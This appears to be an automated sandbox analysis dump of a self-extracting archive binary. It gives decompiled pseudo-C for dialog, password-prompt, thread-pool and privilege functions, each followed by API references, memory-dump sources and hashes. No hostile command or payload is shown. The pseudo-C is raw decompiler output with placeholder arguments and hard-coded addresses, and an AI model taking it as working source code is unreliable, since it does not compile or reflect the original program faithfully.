                                                                            						E00197A15(L"SeRestorePrivilege");
                                                                            						 *0x1d0042 = 1;
                                                                            					}
                                                                            					_push(_t57);
                                                                            					_t58 = 7;
                                                                            					if( *0x1d0041 != 0) {
                                                                            						_t58 = 0xf;
                                                                            					}
                                                                            					_push(_t42);
                                                                            					_t43 =  *((intOrPtr*)(_t61 - 0x20));
                                                                            					_push(_t43);
                                                                            					_push(_t58);
                                                                            					_push( *((intOrPtr*)(_t61 + 0xc)));
                                                                            					if( *0x1cde80() == 0) {
                                                                            						if(E0019B32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
                                                                            							L10:
                                                                            							E00196BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
                                                                            							_t32 = GetLastError();
                                                                            							E001AE214(_t32);
                                                                            							if(_t32 == 5 && E0019FC98() == 0) {
                                                                            								E00191567(_t61 - 0x6c, 0x18);
                                                                            								E001A0A9F(_t61 - 0x6c);
                                                                            							}
                                                                            							E00196E03(0x1d00e0, 1);
                                                                            						} else {
                                                                            							_t39 =  *0x1cde80(_t61 - 0x106c, _t58, _t43);
                                                                            							_t70 = _t39;
                                                                            							if(_t39 == 0) {
                                                                            								goto L10;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				_t26 = E0019159C(_t61 - 0x20);
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
                                                                            				return _t26;
                                                                            			}













                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001973BE
                                                                              • Part of subcall function 0019399D: __EH_prolog.LIBCMT ref: 001939A2
                                                                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00197485
                                                                              • Part of subcall function 00197A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00197A24
                                                                              • Part of subcall function 00197A15: GetLastError.KERNEL32 ref: 00197A6A
                                                                              • Part of subcall function 00197A15: CloseHandle.KERNEL32(?), ref: 00197A79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                            • API String ID: 3813983858-639343689
                                                                            • Opcode ID: 069532bd187b4d36f16b0aabbb29e61c9fa85ac6bd13d494fee396798848bfe4
                                                                            • Instruction ID: 0f70a4611037d0eb46a55db925e28ad217a3d3b302cc8837f6cdf2969edd3836
                                                                            • Opcode Fuzzy Hash: 069532bd187b4d36f16b0aabbb29e61c9fa85ac6bd13d494fee396798848bfe4
                                                                            • Instruction Fuzzy Hash: 0831C771A04204AADF21EB64DC41FFE7FB9AF65354F044059F409A7193C7748E84C7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 62%
                                                                            			E001A9B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
                                                                            				void* _t12;
                                                                            				void* _t16;
                                                                            				void* _t22;
                                                                            				WCHAR** _t24;
                                                                            				void* _t25;
                                                                            				intOrPtr _t27;
                                                                            				void* _t28;
                                                                            				struct HWND__* _t30;
                                                                            				signed short _t31;
                                                                            
                                                                            				_t24 = _a16;
                                                                            				_t31 = _a12;
                                                                            				_t30 = _a4;
                                                                            				_t27 = _a8;
                                                                            				if(E001912D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
                                                                            					L14:
                                                                            					__eflags = 1;
                                                                            					return 1;
                                                                            				}
                                                                            				_t28 = _t27 - 0x110;
                                                                            				if(_t28 == 0) {
                                                                            					_push( *_t24);
                                                                            					 *0x1efe38 = _t24;
                                                                            					L13:
                                                                            					SetDlgItemTextW(_t30, 0x66, ??);
                                                                            					goto L14;
                                                                            				}
                                                                            				if(_t28 != 1) {
                                                                            					L6:
                                                                            					return 0;
                                                                            				}
                                                                            				_t12 = (_t31 & 0x0000ffff) - 1;
                                                                            				if(_t12 == 0) {
                                                                            					GetDlgItemTextW(_t30, 0x66,  *( *0x1efe38), ( *0x1efe38)[1]);
                                                                            					_push(1);
                                                                            					L10:
                                                                            					EndDialog(_t30, ??);
                                                                            					goto L14;
                                                                            				}
                                                                            				_t16 = _t12 - 1;
                                                                            				if(_t16 == 0) {
                                                                            					_push(0);
                                                                            					goto L10;
                                                                            				}
                                                                            				if(_t16 == 0x65) {
                                                                            					_push(0);
                                                                            					_push(E0019B943(__eflags,  *( *0x1efe38)));
                                                                            					_push( *( *0x1efe38));
                                                                            					_push(E0019DA42(_t25, 0x8e));
                                                                            					_t22 = E001910B0(_t30);
                                                                            					__eflags = _t22;
                                                                            					if(_t22 == 0) {
                                                                            						goto L14;
                                                                            					}
                                                                            					_push( *( *0x1efe38));
                                                                            					goto L13;
                                                                            				}
                                                                            				goto L6;
                                                                            			}













                                                                            APIs
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            • EndDialog.USER32(?,00000001), ref: 001A9C15
                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001A9C2A
                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001A9C3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemText$DialogWindow
                                                                            • String ID: ASKNEXTVOL
                                                                            • API String ID: 445417207-3402441367
                                                                            • Opcode ID: 9bd386b9d521c2045c296780ba58f128de687d85c9991c312922489ff14bde54
                                                                            • Instruction ID: c5b4b638fbbb7480362f0545dc7f738f39f45a469f4a6da5c16310bd5ccf0af3
                                                                            • Opcode Fuzzy Hash: 9bd386b9d521c2045c296780ba58f128de687d85c9991c312922489ff14bde54
                                                                            • Instruction Fuzzy Hash: 2D112637304640BFD611AFA8ED48F6E3BA8EB5B710F150024F6019B0B6C762AAC39765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E0019CE52(void* __ebx, void* __ecx, void* __edi) {
                                                                            				void* __esi;
                                                                            				intOrPtr _t26;
                                                                            				signed int* _t30;
                                                                            				void* _t31;
                                                                            				void* _t34;
                                                                            				void* _t42;
                                                                            				void* _t44;
                                                                            				void* _t46;
                                                                            				void* _t48;
                                                                            				void* _t49;
                                                                            				void* _t50;
                                                                            
                                                                            				_t44 = __edi;
                                                                            				_t43 = __ecx;
                                                                            				_t42 = __ebx;
                                                                            				_t48 = _t49 - 0x64;
                                                                            				_t50 = _t49 - 0xac;
                                                                            				_t46 = __ecx;
                                                                            				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
                                                                            					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
                                                                            					 *((char*)(_t48 + 8)) = 0;
                                                                            					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
                                                                            					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
                                                                            						E001A11FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
                                                                            					}
                                                                            					_t26 =  *((intOrPtr*)(_t48 + 0x70));
                                                                            					if(_t26 == 0) {
                                                                            						E0019FA56(_t48 + 8, "s", 0x50);
                                                                            					} else {
                                                                            						_t34 = _t26 - 1;
                                                                            						if(_t34 == 0) {
                                                                            							_push(_t48 - 0x48);
                                                                            							_push("$%s");
                                                                            							goto L9;
                                                                            						} else {
                                                                            							if(_t34 == 1) {
                                                                            								_push(_t48 - 0x48);
                                                                            								_push("@%s");
                                                                            								L9:
                                                                            								_push(0x50);
                                                                            								_push(_t48 + 8);
                                                                            								E0019D9DC();
                                                                            								_t50 = _t50 + 0x10;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_t16 = _t46 + 0x18; // 0x63
                                                                            					_t18 = _t46 + 0x14; // 0xf46028
                                                                            					_t30 = E001B4E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0019CC88);
                                                                            					if(_t30 == 0) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						_t20 = 0x1cd158 +  *_t30 * 0xc; // 0x1c33e0
                                                                            						E001B54E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
                                                                            						_t31 = 1;
                                                                            					}
                                                                            				} else {
                                                                            					L1:
                                                                            					_t31 = 0;
                                                                            				}
                                                                            				return _t31;
                                                                            			}















                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: __fprintf_l_strncpy
                                                                            • String ID: $%s$@%s
                                                                            • API String ID: 1857242416-834177443
                                                                            • Opcode ID: 8e32a42931debe4259b15aed91fda1e8b4adc5f4cfb9710d0c30d8a40c7fa226
                                                                            • Instruction ID: 9a8c7e85f7bf7917fc05912e79f603e1214b7471701ace55f115c398a22bad87
                                                                            • Opcode Fuzzy Hash: 8e32a42931debe4259b15aed91fda1e8b4adc5f4cfb9710d0c30d8a40c7fa226
                                                                            • Instruction Fuzzy Hash: D4219D7284030CAFEF20DFA4CD05FEE3FA8AB15740F044026FE55961A2E371D6559BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E001AA0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                                            				short _v260;
                                                                            				void* __ebx;
                                                                            				void* _t15;
                                                                            				signed short _t24;
                                                                            				struct HWND__* _t28;
                                                                            				intOrPtr _t29;
                                                                            				void* _t30;
                                                                            
                                                                            				_t24 = _a12;
                                                                            				_t29 = _a8;
                                                                            				_t28 = _a4;
                                                                            				if(E001912D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
                                                                            					L10:
                                                                            					return 1;
                                                                            				}
                                                                            				_t30 = _t29 - 0x110;
                                                                            				if(_t30 == 0) {
                                                                            					SetDlgItemTextW(_t28, 0x67, _a16);
                                                                            					goto L10;
                                                                            				}
                                                                            				if(_t30 != 1) {
                                                                            					L5:
                                                                            					return 0;
                                                                            				}
                                                                            				_t15 = (_t24 & 0x0000ffff) - 1;
                                                                            				if(_t15 == 0) {
                                                                            					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
                                                                            					E0019E90C(_t24, 0x1e5c00,  &_v260);
                                                                            					E0019E957( &_v260, 0x80);
                                                                            					_push(1);
                                                                            					L7:
                                                                            					EndDialog(_t28, ??);
                                                                            					goto L10;
                                                                            				}
                                                                            				if(_t15 == 1) {
                                                                            					_push(0);
                                                                            					goto L7;
                                                                            				}
                                                                            				goto L5;
                                                                            			}











                                                                            APIs
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            • EndDialog.USER32(?,00000001), ref: 001AA0FE
                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001AA116
                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 001AA144
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemText$DialogWindow
                                                                            • String ID: GETPASSWORD1
                                                                            • API String ID: 445417207-3292211884
                                                                            • Opcode ID: 1823099b82d81c8600824940d94bd3adce72ea577194971edcbfc78ab46e7758
                                                                            • Instruction ID: 22d058a770c1e9d9e4afa15a4a926b8fa83a488868b6a226dcaf105f6535d9e6
                                                                            • Opcode Fuzzy Hash: 1823099b82d81c8600824940d94bd3adce72ea577194971edcbfc78ab46e7758
                                                                            • Instruction Fuzzy Hash: 4B110436940219B7DB219E689D49FFF7B7CEF1B710F810025FA45F2080C7A5D991C662
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
                                                                            			E0019B1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
                                                                            				short _t10;
                                                                            				void* _t13;
                                                                            				signed int _t14;
                                                                            				short* _t20;
                                                                            				void* _t23;
                                                                            				signed short* _t27;
                                                                            				signed int _t29;
                                                                            				signed int _t31;
                                                                            
                                                                            				_t20 = _a8;
                                                                            				_t27 = _a4;
                                                                            				 *_t20 = 0;
                                                                            				_t10 = E0019B4C6(_t27);
                                                                            				if(_t10 == 0) {
                                                                            					_t29 = 0x5c;
                                                                            					if( *_t27 == _t29 && _t27[1] == _t29) {
                                                                            						_push(_t29);
                                                                            						_push( &(_t27[2]));
                                                                            						_t10 = E001B0BB8(__ecx);
                                                                            						_pop(_t23);
                                                                            						if(_t10 != 0) {
                                                                            							_push(_t29);
                                                                            							_push(_t10 + 2);
                                                                            							_t13 = E001B0BB8(_t23);
                                                                            							if(_t13 == 0) {
                                                                            								_t14 = E001B2B33(_t27);
                                                                            							} else {
                                                                            								_t14 = (_t13 - _t27 >> 1) + 1;
                                                                            							}
                                                                            							asm("sbb esi, esi");
                                                                            							_t31 = _t29 & _t14;
                                                                            							E001B4DDA(_t20, _t27, _t31);
                                                                            							_t10 = 0;
                                                                            							 *((short*)(_t20 + _t31 * 2)) = 0;
                                                                            						}
                                                                            					}
                                                                            					return _t10;
                                                                            				}
                                                                            				return E00193E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
                                                                            			}












                                                                            APIs
                                                                            • _swprintf.LIBCMT ref: 0019B1DE
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                            • _wcschr.LIBVCRUNTIME ref: 0019B1FC
                                                                            • _wcschr.LIBVCRUNTIME ref: 0019B20C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                            • String ID: %c:\
                                                                            • API String ID: 525462905-3142399695
                                                                            • Opcode ID: 1cc9b72273620878ba992ab7ac7480ada6f7352b270faab555e87a34b377aae5
                                                                            • Instruction ID: bd181fe1d47def878e8d2076933a57d87fe014724916e2cabd1c5f3091fe6cf0
                                                                            • Opcode Fuzzy Hash: 1cc9b72273620878ba992ab7ac7480ada6f7352b270faab555e87a34b377aae5
                                                                            • Instruction Fuzzy Hash: 9201B95350931166DE316B75ADC6DAFB7ACDE69B60B50841AFC44C7182FB30E854C2B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                            			E001A0326(long* __ecx, long _a4) {
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				long _t11;
                                                                            				void* _t14;
                                                                            				long _t23;
                                                                            				long* _t25;
                                                                            
                                                                            				_t19 = __ecx;
                                                                            				_t11 = _a4;
                                                                            				_t25 = __ecx;
                                                                            				_t23 = 0x40;
                                                                            				 *__ecx = _t11;
                                                                            				if(_t11 > _t23) {
                                                                            					 *__ecx = _t23;
                                                                            				}
                                                                            				if( *_t25 == 0) {
                                                                            					 *_t25 = 1;
                                                                            				}
                                                                            				_t25[0x41] = 0;
                                                                            				if( *_t25 > _t23) {
                                                                            					 *_t25 = _t23;
                                                                            				}
                                                                            				_t3 =  &(_t25[0xc8]); // 0x320
                                                                            				_t25[0xc5] = 0;
                                                                            				InitializeCriticalSection(_t3);
                                                                            				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
                                                                            				_t14 = CreateEventW(0, 1, 1, 0);
                                                                            				_t25[0xc7] = _t14;
                                                                            				if(_t25[0xc6] == 0 || _t14 == 0) {
                                                                            					_push(L"\nThread pool initialization failed.");
                                                                            					_push(0x1d00e0);
                                                                            					E00196CC9(E00196CCE(_t19), 0x1d00e0, _t25, 2);
                                                                            				}
                                                                            				_t25[0xc3] = 0;
                                                                            				_t25[0xc4] = 0;
                                                                            				_t25[0x42] = 0;
                                                                            				return _t25;
                                                                            			}










                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000,?,00000001,?), ref: 001A035F
                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000), ref: 001A0369
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000), ref: 001A0379
                                                                            Strings
                                                                            • Thread pool initialization failed., xrefs: 001A0391
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                            • String ID: Thread pool initialization failed.
                                                                            • API String ID: 3340455307-2182114853
                                                                            • Opcode ID: 3322df7e2b5185fee912d9a3a4b8c110418cb82895180b5495951a629cb6672a
                                                                            • Instruction ID: a8a8fae24cffdf0b485545c3cc053ae4dc8a5bed0bcf8837f48432caa39ac190
                                                                            • Opcode Fuzzy Hash: 3322df7e2b5185fee912d9a3a4b8c110418cb82895180b5495951a629cb6672a
                                                                            • Instruction Fuzzy Hash: 111130B5500708AFD7225F769C84AABFBECFF6A755F10482EF1DA86201D7716980CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AC96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                            				long _v0;
                                                                            				_Unknown_base(*)()* _t16;
                                                                            				int _t22;
                                                                            				WCHAR* _t25;
                                                                            
                                                                            				 *0x1ece10 = _a12;
                                                                            				 *0x1ece14 = _a16;
                                                                            				 *0x1d75f4 = _a20;
                                                                            				if( *0x1d75d3 == 0) {
                                                                            					if( *0x1d75d2 == 0) {
                                                                            						_t16 = E001AAFB9;
                                                                            						_t25 = L"REPLACEFILEDLG";
                                                                            						while(1) {
                                                                            							_t22 = DialogBoxParamW( *0x1d0064, _t25,  *0x1d75c8, _t16, _a4);
                                                                            							if(_t22 != 4) {
                                                                            								break;
                                                                            							}
                                                                            							if(DialogBoxParamW( *0x1d0060, L"RENAMEDLG",  *0x1d75d8, E001AC2A7, _v0) != 0) {
                                                                            								break;
                                                                            							}
                                                                            						}
                                                                            						return _t22;
                                                                            					}
                                                                            					return 1;
                                                                            				}
                                                                            				return 0;
                                                                            			}








                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                            • API String ID: 0-56093855
                                                                            • Opcode ID: efcbbcc5f56ac0fbdfed6e000527a8fc796635f80b2222f679902907d193332c
                                                                            • Instruction ID: 1d95dc2d65c10db194e437dfd808561d5d9302b215bc070d9d95cb2d8d3d1a9a
                                                                            • Opcode Fuzzy Hash: efcbbcc5f56ac0fbdfed6e000527a8fc796635f80b2222f679902907d193332c
                                                                            • Instruction Fuzzy Hash: 9901D47620A206AFC7019B58FD40F67BBE9E74A794F000427F451E2670D7329C91DBE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 66%
                                                                            			E001AC891(void* __eflags, WCHAR* _a4) {
                                                                            				char _v8196;
                                                                            				int _t7;
                                                                            				WCHAR* _t12;
                                                                            				void* _t14;
                                                                            
                                                                            				_t14 = __eflags;
                                                                            				E001AD940();
                                                                            				SetEnvironmentVariableW(L"sfxcmd", _a4);
                                                                            				_t7 = E0019F835(_t14, _a4,  &_v8196, 0x1000);
                                                                            				_t12 = _t7;
                                                                            				if(_t12 != 0) {
                                                                            					_push( *_t12 & 0x0000ffff);
                                                                            					while(E0019F94C() != 0) {
                                                                            						_t12 =  &(_t12[1]);
                                                                            						__eflags = _t12;
                                                                            						_push( *_t12 & 0x0000ffff);
                                                                            					}
                                                                            					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12);
                                                                            				}
                                                                            				return _t7;
                                                                            			}








                                                                            APIs
                                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 001AC8A7
                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001AC8E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EnvironmentVariable
                                                                            • String ID: sfxcmd$sfxpar
                                                                            • API String ID: 1431749950-3493335439
                                                                            • Opcode ID: 5ef06855962b962f08b8d839d65f2d59ae6a7bb0b1e02a61b82fbbb71948969f
                                                                            • Instruction ID: 424df4914bd5e76099f71d044a1b3e66ab4269cdf28ba7fcb172c749292a8312
                                                                            • Opcode Fuzzy Hash: 5ef06855962b962f08b8d839d65f2d59ae6a7bb0b1e02a61b82fbbb71948969f
                                                                            • Instruction Fuzzy Hash: CAF0A7B6800225B7DB202FD19C09FBA7B6CEF25B51B04406AFD4996152DB74C841D7F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E001B8749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				unsigned int _v20;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				char _v40;
                                                                            				intOrPtr _v48;
                                                                            				char _v52;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* _t86;
                                                                            				signed int _t92;
                                                                            				signed int _t93;
                                                                            				signed int _t94;
                                                                            				signed int _t100;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            				void* _t104;
                                                                            				void* _t107;
                                                                            				void* _t109;
                                                                            				void* _t111;
                                                                            				void* _t115;
                                                                            				char* _t116;
                                                                            				void* _t119;
                                                                            				signed int _t121;
                                                                            				signed int _t128;
                                                                            				signed int* _t129;
                                                                            				signed int _t136;
                                                                            				signed int _t137;
                                                                            				char _t138;
                                                                            				signed int _t139;
                                                                            				signed int _t142;
                                                                            				signed int _t146;
                                                                            				signed int _t151;
                                                                            				char _t156;
                                                                            				char _t157;
                                                                            				void* _t161;
                                                                            				unsigned int _t162;
                                                                            				signed int _t164;
                                                                            				signed int _t166;
                                                                            				signed int _t170;
                                                                            				void* _t171;
                                                                            				signed int* _t172;
                                                                            				signed int _t174;
                                                                            				signed int _t181;
                                                                            				signed int _t182;
                                                                            				signed int _t183;
                                                                            				signed int _t184;
                                                                            				signed int _t185;
                                                                            				signed int _t186;
                                                                            				signed int _t187;
                                                                            
                                                                            				_t171 = __edx;
                                                                            				_t181 = _a24;
                                                                            				if(_t181 < 0) {
                                                                            					_t181 = 0;
                                                                            				}
                                                                            				_t184 = _a8;
                                                                            				 *_t184 = 0;
                                                                            				E001B3356(0,  &_v52, _t171, _a36);
                                                                            				_t5 = _t181 + 0xb; // 0xb
                                                                            				if(_a12 > _t5) {
                                                                            					_t172 = _a4;
                                                                            					_t142 = _t172[1];
                                                                            					_v36 =  *_t172;
                                                                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                            						L11:
                                                                            						__eflags = _t142 & 0x80000000;
                                                                            						if((_t142 & 0x80000000) != 0) {
                                                                            							 *_t184 = 0x2d;
                                                                            							_t184 = _t184 + 1;
                                                                            							__eflags = _t184;
                                                                            						}
                                                                            						__eflags = _a28;
                                                                            						_v16 = 0x3ff;
                                                                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                            						__eflags = _t172[1] & 0x7ff00000;
                                                                            						_v32 = _t136;
                                                                            						_t86 = 0x30;
                                                                            						if((_t172[1] & 0x7ff00000) != 0) {
                                                                            							 *_t184 = 0x31;
                                                                            							_t185 = _t184 + 1;
                                                                            							__eflags = _t185;
                                                                            						} else {
                                                                            							 *_t184 = _t86;
                                                                            							_t185 = _t184 + 1;
                                                                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                            							__eflags = _t164;
                                                                            							if(_t164 != 0) {
                                                                            								_v16 = 0x3fe;
                                                                            							} else {
                                                                            								_v16 = _v16 & _t164;
                                                                            							}
                                                                            						}
                                                                            						_t146 = _t185;
                                                                            						_t186 = _t185 + 1;
                                                                            						_v28 = _t146;
                                                                            						__eflags = _t181;
                                                                            						if(_t181 != 0) {
